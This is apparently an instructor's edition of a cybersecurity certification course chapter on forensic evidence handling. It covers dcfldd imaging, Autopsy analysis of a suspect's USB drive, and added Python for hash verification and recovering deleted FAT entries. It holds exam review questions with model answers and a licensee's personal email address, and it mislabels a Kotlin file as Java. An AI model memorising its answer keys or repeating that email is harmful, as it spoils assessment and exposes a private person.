It's inevitable that data on physical media will need to be stored before it is presented in court. How you store evidence to prevent malicious tampering is just as important as storing it to prevent natural degradation. Physical media should be placed in evidence rooms that have controls like locks, guards, surveillance cameras, etc. The only people with access to this room should be authorized investigators. Even managers or executives should be barred from accessing the room during an ongoing investigation, as they may not be familiar with proper evidence-handling protocol.
Storing the media in a secure room is often not enough. Depending on the nature of the physical medium, including its size and sensitivity to contact with other materials, you should consider placing it in a lock box. If some unauthorized person does gain entry to the evidence room, they won't necessarily be able to get to the evidence itself without considerable effort.
However, not all evidence needs this level of protection. For smaller media, like hard drives, discs, thumb drives, and so on, placing them in evidence bags may be sufficient. Evidence bags are not meant to ensure security directly, but they do help you identify, label, and categorize evidence properly. The evidence bags you use might have space on at least one side for you to write the evidence's type, case number, date of collection, name of collecting agent, and a short description. In the absence of such a space to write in, you may be able to affix an evidence tag to the bag that has the same basic information on it. Using the space or a tag, you should also be able to maintain a chain of custody—every time a new person handles the bag and its contents, the chain from person to person is recorded.

Lesson 11: Investigating Cybersecurity Incidents | Topic B

Licensed For Use Only By: Watuthanthirige Chirath De Alwis chirathdealwis@gmail.com M
CyberSec First Responder® (Exam CFR-410) | 445

Forensic Analysis of Compromised Systems

There are various procedures you can follow to help you analyze compromised systems in the event of an incident.

Remind students that the forensic procedures they implement will depend heavily on the context of the incident.

Capture forensic images and memory: One of the most important steps in computer forensic procedures is to capture exact duplicates of the evidence, also known as forensic images. This is accomplished by making a bit-for-bit copy of a piece of media as an image file with high accuracy—a process called bit-stream imaging. In addition, dumping a system's memory may reveal actionable evidence that would otherwise be lost when the system is powered down.

Examine network traffic and logs: Attackers always leave behind traces; you just need to know how and where to look. Logs record everything that happens in an intrusion prevention system (IPS) or intrusion detection system (IDS), and in routers, firewalls, servers, desktops, mainframes, applications, databases, anti-malware software, and virtual private networks (VPNs). With these logs, it is possible to extract the identity of hackers and provide the evidence needed.

Capture video: Video forensics is the method by which video is scrutinized for clues. Tools for computer forensics are used in reassembling video to be used as evidence in a court of law.

Record time offset: The format in which the time is recorded against a file activity, such as file creation, deletion, last modified, and last accessed, has developed to incorporate a local time zone offset against Greenwich Mean Time (GMT). This makes it easier for forensic investigators to determine the exact time the activity took place, even if the computer is moved from one time zone to another or if the time zone has deliberately been changed on a system.

Take hashes: You should take a hash of each piece of electronic evidence, including storage partitions, software, and individual files. Later, law enforcement or other third-party officials can verify the integrity of this evidence by taking their own hashes. If the hashes match, then they can be reasonably certain that the evidence was not tampered with.

Take screenshots and photographs: You should capture screenshots of each and every step of a forensic procedure, especially when you are retrieving evidence using a forensics tool. This will ensure that data present on a compromised system is not tampered with and also provides the court with proof of your use of valid computer forensic methods while extracting the evidence. You should also take photographs of a physical crime scene, especially an undisrupted one, to record physical evidence in its purest, unaltered state.

Identify witnesses: Courts generally accept evidence if it is seconded by the testimony of a witness who observed the procedure by which the evidence was acquired. A computer forensic expert witness is someone who has experience in handling computer forensic tools and is able to establish the validity of the evidence.

Track man hours and expenses: The increase in storage device capacities and encryption strength affects the number of man hours that it can take to assess damage, and consequently increases the expenses incurred in any computer forensics investigation. Capturing this expense is part of the overall damage assessment for the incident. You may also be required to track these things if your organization has an insurance policy.

Dynamic Analysis

Most of the procedures listed in the previous table are considered static analysis procedures. They involve capturing and examining information that is not meant to change or interact with a particular environment. This may not be adequate for your forensic investigation, however. Dynamic analysis procedures enable you to observe evidence as it exhibits activity. This activity may reveal more about the nature of an incident than if you had been analyzing evidence in an inert state.

Most dynamic analysis centers around the use of virtual machine sandboxes, like those used for analyzing malware. Evidence that runs in a sandbox might be able to replicate the events of an incident in a controlled environment, or it might provide you with more information about the source of an incident or its mechanism of action. For example, if you capture a system image, you can construct a VM of that system and run it in the sandbox—taking note of any malicious processes that start automatically.

Guidelines for Securely Collecting and Analyzing Electronic Evidence

Follow these guidelines when collecting and analyzing electronic evidence.

Securely Collecting and Analyzing Electronic Evidence

When collecting and analyzing electronic evidence:
• Collect evidence according to the order of volatility by which data degrades on various storage media.
• Identify the file system and available metadata of the media you're analyzing.
• Engage in file carving and data recovery processes when no file system metadata is present.
• Ensure evidence data is preserved against degradation over a long period of time.
• Replicate evidence data across multiple storage media.
• Record useful and accurate metadata about data collected as evidence.
• Ensure physical evidence is locked behind access control mechanisms to keep unauthorized personnel out.
• Consider placing storage media used as evidence in evidence bags with proper labeling.
• Apply the necessary forensic techniques when collecting and analyzing evidence, including capturing bit-stream images, taking hashes, taking pictures, etc.

ACTIVITY 11-2
Securely Collecting Electronic Evidence

Before You Begin

A virtual copy of Rupert's confiscated USB drive has been added to Kali Linux. You will be using dcfldd, a forensic imaging tool.

Scenario

You presented your preliminary findings to upper management, and they've agreed to confront Rupert. Rupert's supervisor noticed him using a USB drive on his workstation, and asked him to hand it over. Rupert reluctantly complied, and his supervisor passed custody of the USB drive on to you. Management is considering criminal charges against Rupert, so you need to follow proper forensic procedures and make a secure bitwise copy of the drive.

Students may point out that the hashing algorithm used in this activity (MD5) is insecure. This is true, but Autopsy only supports MD5 verification.

1. Make a forensic image of the USB drive using the dcfldd tool.
a) On the Kali Linux desktop, verify that there is a virtual USB drive icon on the desktop (RUPERT).

or
e
at
lic

Note: In a real-world situation, you would connect the USB drive to your
analysis system using a physical write blocker to ensure that you change
nothing on the evidence drive.
up

This is the captured drive for the incident scenario.


b) Open a terminal and enter sudo fdisk -l

c) Verify that there is a 50 megabyte (MB) drive with the name /dev/loop0

e
ut
ib
tr
is
This is the location of the mounted USB drive image.

d) Enter sudo dcfldd if=/dev/loop0 hash=md5 of=~/Desktop/usbimage.dd hashlog=~/Desktop/hash.txt bs=512

Note: In this command, if is the input device, of is the output file, hash is the preferred hash for integrity checking, hashlog saves the hash to a file, and bs is the block transfer size.

e) After the process is complete, verify that the image file was written, as in the following screenshot.

f) From the Kali Linux desktop, double-click hash.txt to open it.



g) Verify the hash is the same as in the following screenshot, and keep this text file open.
Students will copy this hash in the next activity, but you may wish to have them copy it now.

2. Why is it important to take note of the hash value of the drive image?
A: A hash value supports integrity of evidence; when the drive image moves down the chain of custody, the actual hash can be compared to the expected value. If they match, the forensic analyst or court official can confirm that the evidence was not tampered with during this time.
Assure students that they will analyze the contents of the USB drive in the next activity.

3. What kinds of important metadata are usually collected in a drive image such
as this one? How can this metadata shape your investigation?
A: Answers may vary, but metadata can include: directory structure, file locations, file sizes, and the
date a file was created/last modified. This metadata can help a forensic analyst correlate data and
come to understand the bigger picture of an incident.


4. When it comes to keeping this drive image secure, what sort of preservation
techniques would you recommend?
A: Answers will vary. Because data is virtual, and must depend on physical hardware, it's a good idea
to replicate this image across more than one physical medium in case one were to fail. The rooms
in which you store these physical media should be locked and climate controlled.
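The dcfldd command in step 1d copies the device block by block, hashes the stream as it passes and records the digest in a hash log that the next custodian can check against. The Python below is an added example, not dcfldd's code: it does the same over a constructed sample device in a temporary directory, records SHA-256 beside the MD5 that Autopsy expects, and shows verification failing after a single byte changes. The hash-log line format is an assumption.

```python
"""Block-wise imaging with on-the-fly hashing and later verification, as an
added example of what the dcfldd command in this activity does (if=, of=,
hash=, hashlog=, bs=). Not dcfldd's own code; the hash-log line format and
the sample 'device' are assumptions constructed for the example."""
import hashlib
import os
import shutil
import tempfile

ALGORITHMS = ("md5", "sha256")  # MD5 for Autopsy, SHA-256 for stronger integrity


def image_device(src_path, dst_path, hashlog_path, block_size=512):
    """Copy src to dst in block_size chunks, hashing each block as it is
    read so the digests describe exactly the bytes that were imaged.
    Returns {"md5": hex, "sha256": hex} and writes them to hashlog_path."""
    hashers = {name: hashlib.new(name) for name in ALGORITHMS}
    total = 0
    with open(src_path, "rb") as src, open(dst_path, "wb") as dst:
        while True:
            block = src.read(block_size)
            if not block:
                break
            dst.write(block)
            total += len(block)
            for h in hashers.values():
                h.update(block)
    digests = {name: h.hexdigest() for name, h in hashers.items()}
    with open(hashlog_path, "w") as log:
        log.write(f"bytes: {total}\n")
        for name, hexdigest in digests.items():
            log.write(f"{name}: {hexdigest}\n")  # constructed log format
    return digests


def hash_file(path, block_size=512):
    """Re-hash an existing file with the same algorithms, block by block."""
    hashers = {name: hashlib.new(name) for name in ALGORITHMS}
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(block_size), b""):
            for h in hashers.values():
                h.update(block)
    return {name: h.hexdigest() for name, h in hashers.items()}


def read_hashlog(path):
    """Parse the constructed 'name: hex' lines back into a dict."""
    expected = {}
    with open(path) as log:
        for line in log:
            key, _, value = line.strip().partition(": ")
            if key in ALGORITHMS:
                expected[key] = value
    return expected


def verify_image(image_path, hashlog_path):
    """Re-hash the image (as the next custodian or the court would) and
    compare against the recorded digests; one result per algorithm."""
    expected = read_hashlog(hashlog_path)
    actual = hash_file(image_path)
    return {name: actual[name] == expected.get(name) for name in ALGORITHMS}


def demo():
    """End-to-end run on a constructed 50 KiB 'USB drive' in a temp directory:
    image it, verify the clean image, then flip one byte and verify again."""
    workdir = tempfile.mkdtemp(prefix="cfr_imaging_")
    try:
        device = os.path.join(workdir, "loop0.bin")
        image = os.path.join(workdir, "usbimage.dd")
        hashlog = os.path.join(workdir, "hash.txt")
        # Constructed device content: 100 blocks of 512 bytes, block i filled with i.
        content = b"".join(bytes([i % 256]) * 512 for i in range(100))
        with open(device, "wb") as f:
            f.write(content)
        digests = image_device(device, image, hashlog, block_size=512)
        clean = verify_image(image, hashlog)
        # Simulate tampering on a copy: change a single byte in the middle.
        tampered = os.path.join(workdir, "usbimage_tampered.dd")
        shutil.copyfile(image, tampered)
        mid = len(content) // 2
        with open(tampered, "r+b") as f:
            f.seek(mid)
            f.write(b"\x00" if content[mid] != 0 else b"\x01")
        after_tamper = verify_image(tampered, hashlog)
        return {"digests": digests, "image_size": os.path.getsize(image),
                "device_size": len(content), "verify_clean": clean,
                "verify_tampered": after_tamper}
    finally:
        shutil.rmtree(workdir, ignore_errors=True)
```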


ACTIVITY 11-3
Analyzing Forensic Evidence

Before You Begin

You'll be using Autopsy, a forensic analysis tool, to investigate the USB drive image you captured earlier.

Scenario

Now that you've securely collected evidence from Rupert's USB drive, you can begin the process of analyzing the evidence to determine who really is responsible for the incident, why they did it, and how. Being able to answer these questions will not only help you piece together what happened, but will also be extremely valuable in the event that Develetech decides to press charges.

1. Start Autopsy.

a) Open another terminal window.
b) Enter sudo autopsy
c) Right-click the URL and select Open Link.
The Autopsy front-end opens in the Firefox ESR web browser.
2. Using the web browser, create a new case file for RupertCase.
a) Select the New Case button.
b) In the Case Name field, type RupertCase
c) In the Description field, type Possible Industrial Espionage
d) In the Investigator Names field, type your name.


e) Select the New Case button to start your case file.

3. Add a host to the RupertCase file.


a) On the Creating Case page, select Add Host.
b) On the Add a New Host page, replace the text in the Host Name field with USB_Drive
c) In the Description field, type Captured USB


d) Leave the remaining field data at its default and select the Add Host button.

4. Add an image file to the RupertCase file.


a) Select the Add Image button.
b) Select the Add Image File button.
c) In the Location field, type /home/kali/Desktop/usbimage.dd
d) From the Type, select Partition.

e) Select Next.
f) Under Image File Details, select the Add the following MD5 hash value for this image radio button.
g) Return to the open hash.txt file in Kali Linux that has the hash value.
h) Highlight the MD5 hash value (everything after the colon), then, from the Mousepad menu, select
Edit→Copy.
i) Paste the hash value into the text box back in Autopsy.

j) Check the Verify hash after importing? check box.

k) Select the Add button.
l) After the integrity check passes, select OK.
5. Begin examining the captured USB drive for evidence.


a) With the usbimage.dd-0-0 radio button selected, select Analyze.
b) At the top of the screen, select File Analysis.



c) Browse through the files and directories in the top pane.

The details for each file are shown in columns to the right of the file name. They include metadata
about when the file was last written/modified, when it was last accessed, when it was created, and
how large it is.

The $FAT1, $FAT2, and $MBR entries refer to volume metadata, particularly file system data and master boot record (MBR) data. Rupert's USB drive was formatted as FAT32. Everything else is either a file or folder placed there by a user.
Also note that some file names are in red, indicating that they were deleted from this USB storage drive. You can open the RUPERT drive from the desktop to verify that the file browser doesn't show these files—only a forensic tool like Autopsy can recover them.

6. Focusing on just the non-deleted files, what does this tell you about Rupert's interests? Is there anything incriminating so far?
A: Rupert seems to be interested in video games, as the drive includes various files related to them. That's obviously not incriminating by itself, but it may suggest that he was wasting company time and resources if he was using this drive at work. More interestingly, the drive includes the my_contract_invoice3.docx file that the CSIRT identified earlier as being correlated with Pat's breached workstation. There's also a ZIP file with the somewhat suspicious name of nethack-360-win-x86-2.zip.


7. Investigate some of the conspicuous surface files.


a) Select the my_contract_invoice3.docx link.
b) In the bottom pane, verify that Autopsy attempted to provide a preview of the file.

Autopsy can't read DOCX files, but it does at least identify it as being a Microsoft Word 2007+ file.
You can see the raw data that Autopsy failed to parse. You could export this file and open it in a
word processing program, but ultimately, the details of Rupert's invoice aren't important; it's the
presence of the file that matters.


c) In the file list, select the nethack-360-win-x86-2.zip link.


d) In the bottom pane, select Export.

e) In the file download dialog box, ensure Open with Engrampa Archive Manager (default) is selected,
then select OK.
The ZIP archive opens in a file browser. There appear to be various file types, including dynamic link libraries (DLLs), executable files, and some text files. This is obviously some kind of program for Microsoft Windows.

f) Double-click NetHack.txt to open it, then skim through the description.

8. What is this program? Is it incriminating?
A: NetHack is an old text-based dungeon crawler video game. Despite its name, it's not useful for malicious purposes, so there's nothing really incriminating about it. Red herrings like this are always a possibility in forensic work.

9. Investigate the files that were deleted from the USB drive.
a) Close the text file and the file browser related to NetHack.
b) From the bottom left of the Autopsy web page, scroll down and select All Deleted Files.

c) Verify that you see a list of all of the deleted files and folders that Autopsy was able to recover.

10. Just by looking at the list of names, what can you tell about what was deleted from this USB drive?
A: Several files and one folder were deleted. The folder is called DT_Watch_images, and the files have various names, some of which appear incomplete. It may be possible to guess the contents of some of the files based on their names and file extensions. For example, dt-w1_product_specs.pdf is likely the product specification document for Develetech's smartwatch.

11. Continue your investigation of the deleted files.
a) Focus on the files that end in JPG and PNG file extensions.
All of these files begin with $OrphanFiles in their names. Files are orphaned when their parent folder is deleted or otherwise unrecoverable. As you might have guessed, these files were inside the DT_Watch_images folder when it was deleted.
b) Select the C:/$OrphanFiles/_MARTW~1.PNG file to open it in the bottom pane.
c) Verify that Autopsy was able to recover the image and display a thumbnail preview of it.

d) Select the View Full Size Image link to get a better look at the smartwatch processor schematic.
This is very likely the smartwatch_schematic3.png file that was logged in the anti-malware scan of Pat's workstation.

e) Close the tab with the image to return to the directory analysis interface.
f) Back at the top of the file list, select the C:/accel_data_for_ml.csv link.
g) In the bottom pane, verify that Autopsy was able to open this comma-separated values (CSV) file.

This appears to be a dataset. There are rows and columns of data that track different human
activities like walking and running, as well as positioning data at certain timestamps. Develetech
may have been incorporating machine learning into its smartwatch product.

h) In the list of files, select the C:/dt-w1_product_specs.pdf link.


i) Select Export, then, with Open with Firefox selected in the dialog box, select OK.


j) Verify that you can see the product specification document for Develetech's smartwatch—the
LifeWatch.

There's quite a bit of interesting information about the LifeWatch in this document, including its
physical specs, its operating system (Wear OS), its known issues, its testing results, and images of
the product. And, as the watermark and footer imply, it's all meant to be confidential.
k) Close the tab with the PDF to return to the directory analysis interface.

l) In the list of files, select the C:/lfui_app_proj_b1.zip link.


m) Select Export, then, with Open with Engrampa Archive Manager (default) selected in the dialog box,
select OK.

n) Browse through the files in this ZIP archive as desired.



o) Navigate to LifeWatchUI/app/src/main/java/com/develetech/lifewatchui and double-click LifeWatchFace.kt to open it in a text editor.

This is programming code. It's written in Java, one of the languages used to write Android apps. You
can even see Android class declarations at the top of the file. Recall that the product specification
document listed Wear OS as LifeWatch's operating system; Wear OS is a version of Android for
wearable technology. This appears to be a beta version of LifeWatch's user interface app for Wear
OS.
p) Close the text file and the file browser related to the LifeWatchUI app.

12. How will using this tool help you in your case against Rupert?
A: It enables a detailed analysis of information from drive images and gives an investigator the ability to write notes about content and examine evidence without risking contamination of the original evidence.

13. Review all of the artifacts you identified and recovered from Rupert's USB drive. Examine them again in Autopsy if needed. Consider these artifacts in light of what you already know about the events of the incident, as well as the fact that these are highly sensitive files that Rupert does not have authorization to view, much less copy off the server.
Considering all of your work so far, how confident are you of Rupert's involvement in the incident?
A: Answers will vary. Some will think the evidence is overwhelmingly suggesting that Rupert attempted to steal sensitive data from the company and then cover his tracks. Others may hold out on committing to a final judgment, and will want to see if there is any more evidence that could make them more certain.
If students choose to withhold judgment, ask them what other evidence they would need to be convinced of Rupert's guilt. Use this as a way to start a discussion about the importance of critical thinking in forensic analysis.



14. The team is looking to establish a motive. They've interviewed some of Rupert's coworkers, some of whom reveal that Rupert appeared frustrated with his job. He believed that he was underpaid and treated poorly by his bosses. His coworkers claim that, only a few days ago, Rupert mentioned he was offered a job by a competitor.
Given the nature of the evidence you've analyzed, what would you suggest Rupert's intentions were?
A: Answers will vary, but assuming his coworkers' testimony is accurate, Rupert was likely intending to sabotage Develetech, either by giving away its secrets or by selling those secrets to a competitor.

15. Close Autopsy and any other open windows in Kali Linux.
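Why Autopsy listed the recovered image as _MARTW~1.PNG in step 11: on a FAT volume a delete overwrites only the first byte of the file's 8.3 directory entry with 0xE5 and leaves the rest of the entry, and the file's clusters, in place, which is what the All Deleted Files view reads back. The parser below is an added example, not Autopsy's code; it walks a constructed root-directory sector, skips long-name entries, and does not model the orphan handling Autopsy performed for the DT_Watch_images contents.

```python
"""Parse FAT short-name (8.3) directory entries and flag deleted ones.
Added example, not Autopsy's code. The directory sector is constructed;
long-file-name entries are skipped and orphan handling is not modelled."""
import struct
from dataclasses import dataclass

ENTRY_SIZE = 32
ATTR_DIRECTORY = 0x10
ATTR_LFN = 0x0F        # attribute value used by long-file-name entries
DELETED_MARK = 0xE5    # first name byte after a delete
END_OF_DIR = 0x00      # first name byte of a never-used entry


@dataclass
class DirEntry:
    name: str           # 8.3 name; '_' stands in for the overwritten first byte
    deleted: bool
    is_dir: bool
    size: int
    first_cluster: int  # still points at the data, which is why recovery works


def parse_directory(sector):
    """Walk 32-byte entries until the end-of-directory marker. Deleted
    entries are kept and flagged instead of hidden, as a forensic tool does."""
    entries = []
    for off in range(0, len(sector) - ENTRY_SIZE + 1, ENTRY_SIZE):
        raw = sector[off:off + ENTRY_SIZE]
        first = raw[0]
        if first == END_OF_DIR:
            break
        attr = raw[11]
        if attr == ATTR_LFN:
            continue
        deleted = first == DELETED_MARK
        # The original first character is gone for good; show '_' in its place.
        base_bytes = (b"_" + raw[1:8]) if deleted else raw[0:8]
        base = base_bytes.decode("ascii", "replace").rstrip()
        ext = raw[8:11].decode("ascii", "replace").rstrip()
        name = f"{base}.{ext}" if ext else base
        (cluster_hi,) = struct.unpack_from("<H", raw, 20)
        cluster_lo, size = struct.unpack_from("<HI", raw, 26)
        entries.append(DirEntry(name, deleted, bool(attr & ATTR_DIRECTORY),
                                size, (cluster_hi << 16) | cluster_lo))
    return entries


def deleted_entries(sector):
    """What a normal file browser hides and a forensic tool still lists."""
    return [e for e in parse_directory(sector) if e.deleted]


def build_entry(name8, ext3, attr, cluster, size):
    """Construct one 32-byte short-name entry (timestamps zeroed):
    name(8) ext(3) attr(1) reserved+create/access times(8) cluster-hi(2)
    write time/date(4) cluster-lo(2) size(4)."""
    return (name8.ljust(8) + ext3.ljust(3) + bytes([attr]) + b"\x00" * 8
            + struct.pack("<H", cluster >> 16) + b"\x00" * 4
            + struct.pack("<HI", cluster & 0xFFFF, size))


def build_sample_sector():
    """Constructed root directory: a live ZIP, a deleted folder and a deleted
    PNG whose original short name was SMARTW~1.PNG."""
    live = build_entry(b"NETHACK", b"ZIP", 0x20, 5, 4_321_000)
    folder = build_entry(b"\xe5T_WAT~1", b"", ATTR_DIRECTORY, 9, 0)
    png = build_entry(b"\xe5MARTW~1", b"PNG", 0x20, 120, 48_213)
    return live + folder + png + b"\x00" * (512 - 3 * ENTRY_SIZE)
```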


TOPIC C
Follow Up on the Results of an Investigation
No job is done until the paperwork is complete. After you've completed the investigation, you'll need to document your findings in a way that meets with applicable rules, regulations, and laws. You'll also need to follow up to ensure that your organization is protected from a recurrence of such an incident.

Cyberlaw

Cyberlaw governs the behavior of individuals and groups in the use of computers, the Internet, and other IT domains. As with other aspects of the law, the definition and makeup of cyberlaw will vary from state to state and nation to nation. In general, governments that enact and enforce cyberlaws extend legal protection to victims of computer-related crimes, while punishing the perpetrators of these crimes.

In the event your organization is the victim of a security breach or other incident, you may be called on to present evidence in court or act as an expert witness. Even if you are not directly involved in court proceedings, you may be asked to assemble and prepare evidence for a judge. This is why, as a forensic analyst, you should be aware of the cyberlaws that govern your particular jurisdiction. Knowing which laws were broken can help you contextualize your reports in a legal sense, rather than simply dumping all of your collection and analysis efforts into a single, uncoordinated pile of evidence. Legal counsel can help you interpret the law, but it may be up to you to bridge the gap between the technical aspects of evidence and the legal ramifications.
Keep in mind that not all incidents are legal matters, be it because the incident is not covered under the law or because the victim organization chooses not to press charges.

Note: Most states have passed their own cyberlaws beyond those of the federal government.

Example
An example of a cyberlaw is the U.S. Computer Fraud and Abuse Act (CFAA). This law prohibits users from accessing computer systems without authorization and, as a result, obtaining sensitive information like financial records, government records, or any information from a computer with a protected status. Protected computers are defined as computers that are used by financial and government institutions, as well as computers used in interstate and foreign commerce.

Note: For the full text of the CFAA, navigate to https://www.law.cornell.edu/uscode/text/18/1030.

Cyberlaw Internationally
Cyberlaw can vary significantly depending on the jurisdiction, especially in different countries and regions. What constitutes a cybercrime in the United States may not be the same in Germany, Japan, Australia, etc. Although you may not think you're subject to any laws other than the ones in your organization's home country, consider how widespread and distributed information is today. If your business is headquartered in New York, and you hire a cloud storage firm in London that distributes your data to servers around the world, what are the legal ramifications in the event of a breach? It's very likely that your legal case will be subject to the jurisdiction of several foreign nations, not just your own. It may not be enough to know your own country's laws, so you may need to know the laws of the countries that govern where your data is stored.

Lesson 11: Investigating Cybersecurity Incidents | Topic C



Technical Experts and Law Enforcement Liaisons


Following an investigation that becomes a legal matter, you may be asked to serve as a technical expert or a liaison to law enforcement. When you take on these roles, you'll be able to communicate the who, why, and how of an incident to the authorities that can take legal action. If your company does not work closely with law enforcement, it stands little chance of receiving restitution.
To truly take advantage of your organization's legal rights, you need to understand both the abilities and the constraints of law enforcement. Some agencies, like the Federal Bureau of Investigation (FBI), are better suited to dealing with major cybercriminal activity than others. These agencies often have a threshold for interest in an investigation. If your presumed losses barely surpass a few thousand dollars, some agencies may not even bother taking on the investigation. Likewise, smaller, local agencies may be ill equipped, both in staff and technology, to assist in your investigation.
It's also important to understand that law enforcement should not be expected to do all of the work in an investigation. As a liaison or technical expert, you need to share pertinent evidence with authorities without overburdening them with trivial information. You should find out exactly what they need from you—and communicate exactly what you need from them—to ensure a smooth transition. For example, you may need to share your hashed drive images with the authorities, as well as explain their contents and how they may contain evidence of an intrusion. On the other hand, the authorities may possess forensic tools and techniques that go beyond your own capabilities. These might be of great benefit to your investigation.

Documentation of Investigation Results

or
While some forensic tools may have reporting capabilities built in, this is often insufficient to
present as an official report to a wider audience. Tool-assisted reports can be overly technical and
fail to get to the point. That's why you should consider manually writing your reports based on the
Documentation of
Investigation Results
e
results of your investigation. To be effective, these reports must answer the following questions:
• Who tasked you with the investigation?
Use this question to remind yourself who asked you to begin this investigation, so that the authority behind it is clearly established. As mentioned before, investigations are not guaranteed to be quick; on the contrary, many are very slow to progress. Without a record, you may forget. This is especially true if personnel change in the interim or if the company is part of a merger or another change in ownership.
• What were you tasked with?
Use this question to avoid any confusion or disputes at the end of an investigation. You need to define a clear focus for your investigation. Failing to do so may compromise your investigation by bogging it down in irrelevant details or making it seem incoherent.
• What did you investigate?
Use this question to outline all of the actual objects of your investigation, including technology (such as workstations, network appliances, etc.) and people (such as witnesses, suspects, etc.). It is very important that your record of these objects is comprehensive. Instead of simply stating you reviewed "an employee's workstation," you should instead say: "A Dell Inspiron laptop with serial number 12345 running Windows 10, assigned to Aaron Jones on November 21st, 2020 by the company."
• What did you do?
For this question, you should detail the steps you took to actually conduct the investigation. This can include technical processes like capturing system images and taking hashes, and it can also include more operational processes like maintaining the chain of custody by placing evidence in secure, labeled containers.
• What did you find?
You must record all significant events, files, images, machines, testimony, and so on, that are relevant to the investigation. This report is not just to help you remember, but will also likely need to be geared toward an audience, like a boss or the arbiter(s) of the court case. That's why you need to write plainly and practically, and avoid using jargon. For example: "The login records show that a user was signed in under the account A. Jones while the incident took place."
• What does it all mean?
This last question prompts you to piece all of your findings together to offer a conclusion. What do you believe happened, how did it happen, and who do you think is responsible? You cannot necessarily rely on the audience of this report to draw their own conclusions; they'll likely be looking for you to do that, so they can verify the validity of those conclusions. Although these conclusions may be subject to bias, if you support them with evidence, the arbiter(s) of the case will be more inclined to agree.

Lesson 11: Investigating Cybersecurity Incidents | Topic C
462 | CyberSec First Responder® (Exam CFR-410)

CyberSec First Responder® (Exam CFR-410) | 463

ACTIVITY 11-4
Conducting Post-Mortem Activities

Scenario

The investigation is nearing its conclusion, and the evidence points to Rupert as the culprit. The company has terminated his employment as of today. Although you've identified who caused the incident and how, your work is not over. You still need to write a report of your findings, as well as prepare to be involved in a criminal investigation. It's up to you to maximize the usefulness of these follow-up tasks for the benefit of the company and its continued security.

Activity: Conducting Post-Mortem Activities
Consider using this activity as an opportunity for students to actually write a forensic report. Otherwise, have them share their ideas with the class about how the report should be written.

1. Autopsy offers tool-assisted reporting for your investigation, but you need to tailor a report to a wider audience that includes upper management.
Based on your findings of the data breach incident, what would you include in this report?
A: Answers will vary. A useful report includes the following information: who authorized the investigation, the focus of the investigation, the specific people and systems you investigated, what you found, and how it all comes together. For the data breach incident, you may choose to begin the report by stating that you were authorized to perform the investigation by the CISO of Develetech, and that you were tasked with finding out what data was breached and who was responsible. The assets that the team investigated were: Pat's workstation, the system and anti-malware logs on that workstation, the research and development server, the system and network logs of that server, the network logs of various other devices, the people who were indirectly affected by the incident (Charles and the help desk employee), one of the victims (Pat), and the primary suspect (Rupert). What you found is evidence of a failed remote login attempt, evidence of a remote connection from inside the network using certain credentials (Pat's), network logs supporting these connection attempts, host and anti-malware logs indicating that sensitive files were transferred off the research and development server, the USB drive with those files on them, and more. You could then likely end with a way to pull it all together, constructing a single narrative of events as implied by the evidence you found. This narrative should go step-by-step and explain how Rupert breached the server, why he did so, and what he might have done with this stolen data.

2. Based on your thorough report, management has decided to work with legal counsel to determine if any criminal charges can or should be filed.
If Develetech decides to press charges, what can you do to help this initiative?
A: Answers may vary, but a forensic investigator should research the laws that govern the organization, including specifically which laws may have been broken as a result of the data breach. If legal counsel advises the company to press charges, you can further tailor your report to speak to the applicable laws. For example, some laws will place greater value on certain types of evidence, so you'll want to make sure the report focuses on that evidence so that it clearly illustrates how the law was broken.

3. After consulting with its attorneys, the executives at Develetech have decided to press charges against Rupert. The company believes its intellectual property and trade secrets have been stolen for financial gain, which is a violation of the Economic Espionage Act of 1996. In the trial preparation phase, you will be a law enforcement liaison.
How would you suggest collaborating with this non-technical audience?
A: Answers will vary. It's important that the liaison clearly understands what law enforcement officials expect of them, and likewise, communicates what they expect of the officials. This will enable you to exchange information and evidence without issue. Also, you shouldn't expect that local law enforcement will provide a comprehensive level of assistance to your investigation; you may need to do most of the remaining work internally. Still, some agencies (particularly federal ones) may have tools at their disposal that you do not. You should take advantage of these tools wherever possible.


Summary
In this lesson, you switched roles from the first responder to that of a forensic investigator. You created a forensic investigation plan, collected evidence, and reconstructed the incident to determine how the incident was carried out and the motives behind it. You also implemented post-investigation measures that included documenting the investigation and preparing for legal action.

Encourage students to use the social networking tools provided on the CHOICE Course screen to follow up with their peers after the course is completed for further discussion and resources to support continued learning.

From your experience, share a cybersecurity incident that warranted a forensic investigation.
A: Answers will vary. Be prepared to offer an example of a cybersecurity incident that escalated into an investigation. If necessary, you can use an incident from recent real-world events.

What evidence preservation techniques are most commonly implemented in your organization or an organization you're familiar with?
A: Answers will vary. Some students may have experience with physical techniques like placing compromised hardware in lockers or access-controlled rooms. They may also be familiar with evidence bags with labels that help track the chain of custody. For virtual assets, students may be familiar with the process of capturing system images and placing them in secure virtual locations, as well as employing encryption to keep the data confidential.

Note: Check your CHOICE Course screen for opportunities to interact with your classmates, peers, and the larger CHOICE online community about the topics covered in this course or other topics you are interested in. From the Course screen you can also access available resources for a more continuous learning experience.
Course Follow-Up
Congratulations! You have completed the CyberSec First Responder® (Exam CFR-410) course. You have gained the practical skills and information you will need to manage risk, analyze threats and attacks, protect the organization's security, collect and analyze cybersecurity intelligence, and respond to and investigate incidents. All of these skills combined will help you proactively defend your organization against the many threats it faces every day.
You've also gained the knowledge you will need to prepare for the CyberSec First Responder® (Exam CFR-410) certification examination. If you combine this class experience with review, private study, and hands-on experience, you will be well prepared to demonstrate your security expertise both through professional certification and with solid technical competence on the job.

What's Next?

Your next step after completing this course will probably be to prepare for and obtain your CyberSec First Responder certification. In addition, there are a number of advanced and specialized security courses and certifications that you might want to pursue following this course. The Logical Operations course Certified Information Systems Security Professional (CISSP®): Sixth Edition will expand on your knowledge of information security to apply more advanced principles to maintain security in complex enterprise environments. The Certified Cyber Secure Coder® (Exam CSC-210) course will provide you with the skills to develop applications that incorporate security principles throughout the entire development lifecycle. To learn more about artificial intelligence (AI) and machine learning concepts that are used in cybersecurity solutions like SIEMs and EDR, consider taking the Certified Artificial Intelligence (AI) Practitioner (Exam AIP-110) course. There are also many vendor-specific courses available that include material on securing various computing systems.
You are encouraged to explore computer and network security further by actively participating in any of the social media forums set up by your instructor or training administrator through the Social Media tile on the CHOICE Course screen.
A Mapping Course Content to CyberSec First Responder® (Exam CFR-410)

Obtaining CyberSec First Responder® certification requires candidates to pass the exam CyberSec First Responder® (Exam CFR-410).
To assist you in your preparation for the exam, CertNexus has provided a reference document that indicates where the exam objectives are covered in the CertNexus CyberSec First Responder® (Exam CFR-410) courseware.
